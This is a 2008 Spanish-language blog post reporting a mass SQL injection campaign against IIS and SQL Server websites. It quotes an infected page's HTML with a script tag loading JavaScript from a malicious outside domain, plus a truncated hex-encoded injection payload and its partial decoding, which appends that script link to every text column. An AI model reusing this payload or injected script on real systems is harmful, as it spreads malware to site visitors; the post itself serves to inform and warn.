Ataque masivo de Inyección SQL

Mas visitados

DragonBall... - 28,390 views
Video cali... - 20,666 views
DESCARGA E... - 5,581 views
Emuladores... - 4,226 views
Dark AleX ... - 3,883 views
WP-Forum P... - 3,218 views
Manejo de ... - 3,012 views
Como puedo... - 2,949 views
Como Insta... - 2,948 views
GOD of WAR... - 2,612 views

Apr 2008

577 views

N/A

Apareció una noticia en Security Magazine y VirusBulletin de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.

Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea.

Ejercicio sencillo de Comprobación:
Si buscan en Google por “script src http nmidahena.com” o “script src http nihaorr1.com”, encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen “Ver Código Fuente” para que observen el código de la página web. Una vez hecho esto, buscan por “nmidahena, aspder o nihaorr1″; Vale la pena que chequen los suyos, espero no se lleven una sorpresa.

Por ejemplo, el sitio “http://www.sssri.com/websiteenglish/default.asp” aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio “nmidahena.com”:

<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
<script language=javascript >
function JumpDef()
{
window.location.href="../home.htm";
}
</script>
<style>

Lo unico bueno es que estos ataques solo estan dirigidos a sitios con Microsoft IIS con backend de Microsoft SQL SERVER segun http://www.f-secure.com/ el codigo inicia asi(ojo este codigo no esta completo):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
   4C00410052004500200040005400200076006100720063006800610072
   00280032003500350029002C0040004300200076006100720063006800
   610072002800320035003500290020004400450043004C004100520045
   0020005400610062006C0065005F0043007500720073006F0072002000
   43005500520053004F005200200046004F0052002000730065006C0065
   0063007400200061002E006E0061006D0065002C0062002E006E006100
   6D0065002000660072006F006D0020007300790073006F0062006A0065
   00630074007300200061002C0073007900730063006F006C0075006D00
   6E00730020006200200077006800650072006500200061002E00690064
   003D0062002E0069006400200061006E006400200061002E0078007400
   7900700065003D00270075002700200061006E0064002000280062002E
   00780074007900700065003D003900390020006F007200200062002E00
   780074007900700065003D003300350020006…

El cual al momento de ser decodificado resulta en:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
   where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

Lo que se obtiene es que encuentra los campos de tipo texto en la base de datos y agrega un link al javascript malicioso a todos y cada uno de ellos lo que causara que los desplieguen automaticamente.
Esencialmente los atacantes buscan paginas ASO o ASPX conteniendo cualquier tipo de querystring e intentan utilizarlo para hacer el upload de su codigo de insercion de SQL.

Si te gusto este post y te sientes dadivoso,Invitame un cafe

3 Respuestas para “Ataque masivo de Inyección SQL”

June 1st, 2008 at 11:11 am
rEKosPoll desde Dijo:

PXLZ TEAM
/rEKosPoll\
THE BEST TEAM HACKER IN THE WORLD

[Responder]
July 11th, 2008 at 11:58 am
marco desde Dijo:

muy buena pagina e carnal felicidades
la voy a visitar diario no mejor aun la voya agregar a mi

[Responder]
July 11th, 2008 at 3:57 pm
Ruben Omar desde Dijo:

Gracias por el comentario k

[Responder]

Mas visitados

TIME MACHINE